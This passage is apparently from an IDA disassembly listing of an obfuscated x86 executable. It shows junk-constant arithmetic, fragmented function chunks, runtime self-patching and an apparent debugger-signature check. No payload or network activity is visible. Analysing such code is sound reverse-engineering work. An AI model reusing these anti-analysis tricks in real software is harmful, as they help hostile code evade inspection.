loc_43E0FA:				; CODE XREF: hvvrg7ie:0043AEEBj
		xor	eax, 3481F299h

; =============== S U B	R O U T	I N E =======================================



sub_43E100	proc near		; CODE XREF: hvvrg7ie:00457F86p

; FUNCTION CHUNK AT 00439852 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044285D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442EDF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044EB38 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EE3A SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	5B96EE10h
		jmp	loc_44EE3A
sub_43E100	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43E10E:				; CODE XREF: hvvrg7ie:00458446j
		jle	loc_458B27
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_43E114:				; CODE XREF: sub_43E063-4F50j
		rol	ebx, 1
		and	ebx, 0BD88AEC6h
		xor	ebx, 0EC85F24Bh
		popf
		jmp	loc_44E023
; END OF FUNCTION CHUNK	FOR sub_43E063

; =============== S U B	R O U T	I N E =======================================



sub_43E128	proc near		; CODE XREF: hvvrg7ie:004421B3j
					; sub_452D2F+6p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00439D1A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B005 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043BF14 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E19E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EFA0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004409D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B3E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441B9F SIZE 0000002F BYTES
; FUNCTION CHUNK AT 0044202F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442FC5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443860 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00444B3B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00445BE0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00446ADC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044821A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448605 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044890E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044921E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004492E8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00449A1C SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00449FAE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044A9D7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B114 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044B893 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD68 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044C66A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C974 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CD27 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044D054 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D9B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E4AC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FBC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450531 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450D2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D83 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045389D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453EA5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004544F3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004563FC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456BBA SIZE 0000002F BYTES
; FUNCTION CHUNK AT 00456F8E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045708C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457B0D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457CEA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045829F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458B07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459515 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459700 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459E11 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459F61 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A335 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045A442 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045A499 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045A90C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B4F7 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		cmp	eax, ds:dword_44EE2C

loc_43E132:				; CODE XREF: hvvrg7ie:loc_43AF2Aj
		jz	loc_445888

loc_43E138:				; CODE XREF: sub_44359D+Ej
					; hvvrg7ie:0044B637j
		jns	loc_441BAB
		mov	eax, [ebp-4]
		call	sub_445BE8
		mov	[ebp-8], eax
		jmp	loc_44B114
sub_43E128	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346F

loc_43E14E:				; CODE XREF: sub_44346F-7857j
		add	ebp, eax
		jno	loc_446A4C
		or	ecx, ebp
		jmp	loc_43A36F
; END OF FUNCTION CHUNK	FOR sub_44346F
; ---------------------------------------------------------------------------

loc_43E15D:				; CODE XREF: hvvrg7ie:0043C4F1j
		sbb	ebp, 0D09D55D6h

; =============== S U B	R O U T	I N E =======================================



sub_43E163	proc near		; CODE XREF: sub_450590+70DEp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CBB1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044447B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444FFF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447242 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447252 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447CD9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448215 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004487EE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D0F0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451855 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00458D18 SIZE 0000000E BYTES

		xchg	edx, [esp-4+arg_0]

loc_43E166:				; CODE XREF: sub_44955C:loc_45327Cj
		pop	edx
		push	edx
		jmp	loc_44D0F0
sub_43E163	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D809

loc_43E16D:				; CODE XREF: sub_43D809-32ACj
		rol	edi, 9
; END OF FUNCTION CHUNK	FOR sub_43D809
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_43E170:				; CODE XREF: sub_45061E:loc_45566Aj
		or	edi, 0F0D033EEh
		add	edi, 0F4CAF5Fh
		xchg	edi, [esp-4+arg_0]
		jmp	sub_446D8D
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E7F3

loc_43E184:				; CODE XREF: sub_43E7F3+1AEB1j
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jnz	loc_43EE47
		mov	eax, [ebp+var_4]
		call	sub_43EE33

loc_43E199:				; CODE XREF: sub_44D730+13j
		jmp	nullsub_367
; END OF FUNCTION CHUNK	FOR sub_43E7F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_43E19E:				; CODE XREF: sub_43E128+7ABBj
		jmp	loc_445878
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43E1A3:				; CODE XREF: sub_446D8D-3813j
		jmp	loc_43C3A2
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_43E1A8:				; CODE XREF: sub_441FE4:loc_45324Ej
		ror	eax, 0Dh
		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp+0]
		jmp	loc_450DC8
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------

loc_43E1B6:				; CODE XREF: hvvrg7ie:004509E3j
					; hvvrg7ie:loc_459E56j
		and	edx, 0B3544C01h
		or	edx, 4B6400CBh
		sub	edx, 87C6B056h
		add	edx, 8C963147h
		mov	[edx], eax
		jmp	loc_44023E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_43E1D5:				; CODE XREF: sub_452F0E:loc_443547j
		mov	al, [eax]
		jnb	loc_458CB5
		push	offset loc_440C15
		jmp	nullsub_162
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------

loc_43E1E7:				; CODE XREF: hvvrg7ie:0043E605j
		test	ecx, edi
		jmp	loc_44C832
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_43E1EE:				; CODE XREF: sub_43AB99:loc_43D8C9j
					; sub_45A234-165E7j ...
		mov	eax, 6F7h
		call	sub_456C1B
		jnz	loc_44DFFF
		add	eax, 7D0h
		jmp	loc_44D9C2
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_43E208:				; CODE XREF: sub_439FEE+13C16j
		mov	eax, [eax]
		push	eax
		push	eax
		push	0B5B0E4FFh
		pop	eax
		or	eax, 0E9613902h
		jmp	loc_44956C
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_43E21D:				; CODE XREF: sub_4554E8+5275j
		rol	eax, 1Fh
		add	eax, 2395E7FEh
		call	sub_44A705

loc_43E22B:				; CODE XREF: sub_4468C2:loc_45674Cj
		test	ecx, 20h
		jmp	loc_44EDC3
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_43E236:				; CODE XREF: sub_4403B6+8651j
		rol	ebx, 1Ah
		or	ebx, 859A6EA3h
		and	ebx, 0BF437194h
		sub	ebx, 91CA7282h
		xor	ebx, 0B7B915F0h
		add	eax, ebx
		pop	ebx
		jmp	loc_43E9A1
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_44CA9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_43E25F:				; CODE XREF: sub_45488E-95EAj
		or	eax, eax
		jnz	loc_441F5E
		jmp	loc_455B4B
; END OF FUNCTION CHUNK	FOR sub_45488E

; =============== S U B	R O U T	I N E =======================================



sub_43E26C	proc near		; CODE XREF: sub_451176-115F2p
					; hvvrg7ie:004404FCj

; FUNCTION CHUNK AT 0043EBD8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442435 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004494AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ACC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453E30 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004547FE SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	ecx
		mov	[ebp-20h], eax

loc_43E274:				; CODE XREF: hvvrg7ie:0044892Cj
		jmp	loc_442435
sub_43E26C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8A5

loc_43E279:				; CODE XREF: sub_43B8A5+9j
					; sub_451176+4j
		test	byte ptr [ebp-7], 8
		jmp	loc_454AD7
; END OF FUNCTION CHUNK	FOR sub_43B8A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_43E282:				; CODE XREF: sub_45AAC8-17AC2j
		jbe	loc_445AF8
		push	0CDD72C14h

loc_43E28D:				; CODE XREF: sub_45AAC8:loc_448C54j
		push	0E13D9C00h
		pop	eax
		xor	eax, 0CB65BE25h
		or	eax, 4B3368FAh
		xor	eax, 0B6ED63FFh
		push	eax
		jmp	loc_44C74A
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------

loc_43E2AB:				; CODE XREF: hvvrg7ie:0045B535j
		push	4735BE41h
		pop	ecx
		sub	ecx, 4317BE7Fh
		or	ecx, 8DD82F06h
		jmp	loc_43D0C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_43E2C2:				; CODE XREF: sub_452F0E:loc_44A5B5j
		ror	esi, 17h
		push	0C95F1445h
		shl	esi, 1Fh
		cmp	edi, 0FD279E74h
		jmp	loc_43D0FD
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_43E2D8:				; CODE XREF: sub_445F2A:loc_43A30Fj
		jnz	loc_456692
		jmp	loc_444790
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------

loc_43E2E3:				; CODE XREF: hvvrg7ie:loc_44A94Aj
		call	sub_4489AE
		push	202410D6h

loc_43E2ED:				; CODE XREF: hvvrg7ie:0045B7D9j
		pop	eax
		sub	eax, 6277C09Ah
		rol	eax, 1
		cmp	eax, 0F2E060D9h
		jmp	loc_448A9C
; ---------------------------------------------------------------------------
		not	ebp
		jmp	loc_44CDB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441167

loc_43E308:				; CODE XREF: sub_441167:loc_441172j
		push	edi
		mov	edi, edx
		xchg	edi, [esp+0]
		call	sub_4425F0
		push	0F1EF9287h
		pop	eax
		and	eax, 7C4CEA1h
		sub	eax, 0CE4AB07Fh
		jmp	loc_4506AB
; END OF FUNCTION CHUNK	FOR sub_441167
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_43E32A:				; CODE XREF: sub_45889B-916Fj
		jb	loc_451FB8
		push	ecx
		cmp	ecx, eax
		jmp	loc_43FE73
; END OF FUNCTION CHUNK	FOR sub_45889B

; =============== S U B	R O U T	I N E =======================================



sub_43E338	proc near		; CODE XREF: hvvrg7ie:0043A2F4p
					; hvvrg7ie:0044BEFEj
		xchg	edx, [esp+0]
		pop	edx
		push	400h
		mov	eax, [ebp-8]
sub_43E338	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43E344:				; CODE XREF: sub_4465A6:loc_439EC7j
		push	eax
		mov	eax, [ebp-30h]
		jmp	loc_458A30
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_43E34D:				; CODE XREF: sub_44BCAE:loc_45B3B3j
					; hvvrg7ie:0045B3D6j
		add	esi, 55A5603Ch
		xor	eax, esi
		pop	esi
		ror	eax, 1Ch
		push	edx
		push	49BC6ACEh
		jmp	loc_455433
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_43E364:				; CODE XREF: sub_444B29+AA0Fj
		popf

loc_43E365:				; CODE XREF: sub_444B29:loc_44465Ej
		mov	eax, [ebp-4]
		xor	edx, edx
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+0]
		jmp	loc_43C1DF
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_43E375:				; CODE XREF: sub_458706-DB23j
		jge	loc_44D885
		mov	edi, [ecx]
		sbb	esi, ecx
		jmp	loc_45418F
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_43E384:				; CODE XREF: sub_44E3B3:loc_4559D1j
		add	eax, ebp
		add	eax, 0F011AE42h
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_43BCB4
		jmp	loc_4448B8
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
		rol	eax, 12h
		jmp	loc_4408F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43E3A5:				; CODE XREF: sub_450434:loc_43B5FCj
		mov	esi, ecx
		cmp	ebx, 293F97D9h
		jmp	loc_43EA4F
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_43E3B2:				; CODE XREF: sub_45488E-18B80j
		shr	eax, 17h
		jnz	loc_455E65
		jmp	loc_4466B0
; END OF FUNCTION CHUNK	FOR sub_45488E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_343. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443B00

loc_43E3C1:				; CODE XREF: sub_443B00:loc_44D9C7j
		jl	loc_43D71A
; END OF FUNCTION CHUNK	FOR sub_443B00
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_43E3C7:				; CODE XREF: sub_44C072-87CEj
		and	edi, 6C8BF7E9h
		push	0A7C07545h
		sbb	ebp, eax
		jmp	loc_43D716
; END OF FUNCTION CHUNK	FOR sub_44C072
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44440B

loc_43E3D9:				; CODE XREF: sub_44440B:loc_44BBCBj
		pop	esi
		add	esi, 0F59D6CF0h
		xor	esi, 4A434A9Ah
		add	esi, 0DB00DD01h
		xchg	esi, [esp-4+arg_0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_44440B
; ---------------------------------------------------------------------------
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		ror	eax, 6
		mov	dword ptr ds:loc_43D6D6+2, eax
		jmp	loc_44D801
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_43E408:				; CODE XREF: sub_44957E-F3CDj
		sub	ecx, 0F44B3447h
		cmp	ecx, 1353BCADh
		jmp	loc_450AB3
; END OF FUNCTION CHUNK	FOR sub_44957E
; ---------------------------------------------------------------------------

loc_43E419:				; CODE XREF: hvvrg7ie:0043BF09j
		or	ebx, 0A2CFF6E6h
		mov	ebp, 71E505E6h
; START	OF FUNCTION CHUNK FOR sub_442B5C

loc_43E424:				; CODE XREF: sub_442B5C:loc_43BEF3j
		xor	edi, 0F944750Fh
		or	edi, 376D1EF7h
		jmp	loc_455911
; END OF FUNCTION CHUNK	FOR sub_442B5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_43E435:				; CODE XREF: sub_43B3BE+4492j
		jo	loc_454AE6

loc_43E43B:				; CODE XREF: sub_43B3BE:loc_452217j
		xor	eax, eax
		call	sub_452238
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; START	OF FUNCTION CHUNK FOR sub_451F50

loc_43E442:				; CODE XREF: sub_451F50+10j
		jmp	loc_45A030
; END OF FUNCTION CHUNK	FOR sub_451F50
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_538. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_43E448:				; CODE XREF: sub_4426E2+Cj
		jmp	loc_4448AD
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3E8

loc_43E44D:				; CODE XREF: sub_44D3E8+Cj
		add	eax, 0E82F343Eh
		mov	eax, [eax]
		mov	al, [eax]
		jnz	loc_458FD0
		sub	al, 99h
		push	offset loc_443CD6
		jmp	loc_444B05
; END OF FUNCTION CHUNK	FOR sub_44D3E8
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 25h
; ---------------------------------------------------------------------------
		xchg	eax, ebx
		add	[eax], eax
		add	ebp, esi
		jmp	loc_45AB17
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_43E476:				; CODE XREF: sub_450246-16A62j
		mov	ebp, edx
		sub	edx, esi

loc_43E47A:				; CODE XREF: sub_450246:loc_44DD6Aj
		movzx	eax, word ptr [ebp-6]
		push	ebx
		jmp	loc_43C53D
; END OF FUNCTION CHUNK	FOR sub_450246

; =============== S U B	R O U T	I N E =======================================



sub_43E484	proc near		; CODE XREF: hvvrg7ie:004469C7p
					; hvvrg7ie:0044F572j

; FUNCTION CHUNK AT 0043FB15 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453A23 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AAFB SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	edx
		cmp	dword ptr [ebp-4], 0
		jz	loc_44A3DE
		jmp	loc_453A23
sub_43E484	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_43E498:				; CODE XREF: sub_4500FA+2262j
		jo	loc_452778
		jmp	loc_44EE00
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------

loc_43E4A3:				; CODE XREF: hvvrg7ie:0044C9DCj
		xor	ebp, ebx
		pop	esi
; START	OF FUNCTION CHUNK FOR sub_453B74

loc_43E4A6:				; CODE XREF: sub_453B74+Cj
		or	eax, 94A5095Fh
		sub	eax, 0AFFF7F62h
		and	eax, 0E1F369BEh
		jmp	loc_452BF0
; END OF FUNCTION CHUNK	FOR sub_453B74
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_43E4BD:				; CODE XREF: sub_4500FA:loc_43BDF0j
					; sub_4500FA-142F8j
		rol	eax, 0Dh
		add	eax, 2041941Eh
		add	eax, ebp
		push	offset sub_45200C
		jmp	loc_457FB8
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43E4D2:				; CODE XREF: sub_44D2F8+A58Ej
		cmp	eax, ebp
		jmp	loc_441211
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442ADB

loc_43E4D9:				; CODE XREF: sub_442ADB:loc_4502E1j
					; hvvrg7ie:004575EEj
		mov	eax, [esp+0]
		push	edi
		push	91AAEB7Bh
		pop	edi
		jmp	loc_44B166
; END OF FUNCTION CHUNK	FOR sub_442ADB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_43E4E8:				; CODE XREF: sub_4462F9-16Cj
		ror	esi, 2
		jnb	loc_443FD6
		jmp	sub_458992
; END OF FUNCTION CHUNK	FOR sub_4462F9
; ---------------------------------------------------------------------------

loc_43E4F6:				; CODE XREF: hvvrg7ie:0044AE20j
		jns	loc_45195D
		xor	ecx, 0BAB47C38h
		jmp	sub_439529

; =============== S U B	R O U T	I N E =======================================



sub_43E507	proc near		; CODE XREF: sub_45196D:loc_43F7F9p
					; hvvrg7ie:004576C5j

; FUNCTION CHUNK AT 00439918 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445901 SIZE 00000008 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_44CB64
		mov	eax, 462C961Fh
		call	sub_450C5A
		mov	ds:off_41D16C, eax
		lea	eax, sub_45196D
		jmp	loc_439918
sub_43E507	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_43E52B:				; CODE XREF: hvvrg7ie:0043AC0Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_43E52C:				; CODE XREF: sub_4484E1+A233j
		jmp	loc_45479C
; END OF FUNCTION CHUNK	FOR sub_4484E1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43E532	proc near		; DATA XREF: hvvrg7ie:0043A5D0o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A3FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A9CF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043FD6E SIZE 00000005 BYTES

		push	edi
		mov	edi, esi
		xchg	edi, [esp+4+var_4]
		push	7DB4E79h
		pop	esi
		sub	esi, 99AA6E09h
		jmp	loc_43FD6E
sub_43E532	endp

; ---------------------------------------------------------------------------

loc_43E549:				; CODE XREF: hvvrg7ie:00454929j
		call	sub_450C5A
		mov	ds:off_41D078, eax
		lea	eax, sub_43A0C9
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A41E
; ---------------------------------------------------------------------------

loc_43E562:				; CODE XREF: hvvrg7ie:0043C06Ej
		test	al, al
		jz	locret_44FCDE
		jmp	loc_449827
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_43E56F:				; CODE XREF: sub_442334:loc_45A93Dj
		jnz	loc_452BDA
		jmp	loc_44519C
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------

loc_43E57A:				; CODE XREF: hvvrg7ie:0043FCC4j
		add	eax, ebp
		add	eax, 3E897E00h
		mov	eax, [eax]
		add	eax, eax
		jmp	loc_439129
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540B2

loc_43E58B:				; CODE XREF: sub_4540B2+1E82j
		add	eax, [esp+0Ch+var_C]
		adc	edx, [esp+0Ch+var_8]
		add	esp, 8

loc_43E595:				; CODE XREF: hvvrg7ie:loc_43A71Ej
		jmp	loc_4490C0
; END OF FUNCTION CHUNK	FOR sub_4540B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_43E59A:				; CODE XREF: sub_44E4A6:loc_45462Ej
		add	ecx, 9875FFE0h
		xchg	ecx, [esp+4+var_4]
		jmp	loc_44D382
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; ---------------------------------------------------------------------------

loc_43E5A8:				; CODE XREF: hvvrg7ie:loc_456928j
		push	edi
		mov	edi, ecx
		xchg	edi, [esp]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		jmp	loc_457788
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_43E7F3
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454669

loc_43E5C2:				; CODE XREF: sub_454669-46C3j
		jmp	nullsub_541
; END OF FUNCTION CHUNK	FOR sub_454669
; ---------------------------------------------------------------------------

loc_43E5C7:				; CODE XREF: hvvrg7ie:0044751Bj
		jmp	locret_448B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446072

loc_43E5CC:				; CODE XREF: sub_446072+Bj
		jmp	loc_43B6E7
; END OF FUNCTION CHUNK	FOR sub_446072
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_43E5D1:				; CODE XREF: sub_450F97-11487j
		jmp	loc_44496C
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
		dw 0A99Eh
dword_43E5D8	dd 4F316B36h		; DATA XREF: sub_45AAC8:loc_448F3Br
					; sub_45AAC8+6r
; ---------------------------------------------------------------------------
		call	nullsub_500
		jmp	ds:dword_41D0EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_43E5E7:				; CODE XREF: sub_448BC0-D37Aj
		jmp	loc_4549FE
; END OF FUNCTION CHUNK	FOR sub_448BC0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_500. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		cmp	al, 24h
		mov	edx, edi
		jmp	loc_445DB1
; ---------------------------------------------------------------------------

loc_43E5F6:				; CODE XREF: hvvrg7ie:loc_45477Aj
		jl	loc_44C83E

loc_43E5FC:				; CODE XREF: hvvrg7ie:00451D42j
		jmp	loc_43A125
; ---------------------------------------------------------------------------
		mov	esi, eax
		sub	edx, ebp
		jmp	loc_43E1E7

; =============== S U B	R O U T	I N E =======================================



sub_43E60A	proc near		; CODE XREF: sub_450434-35C1p
					; hvvrg7ie:0045238Aj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A650 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B568 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043B608 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043B937 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CCF7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441551 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441FB6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004427C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442D18 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044442C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044517F SIZE 00000017 BYTES
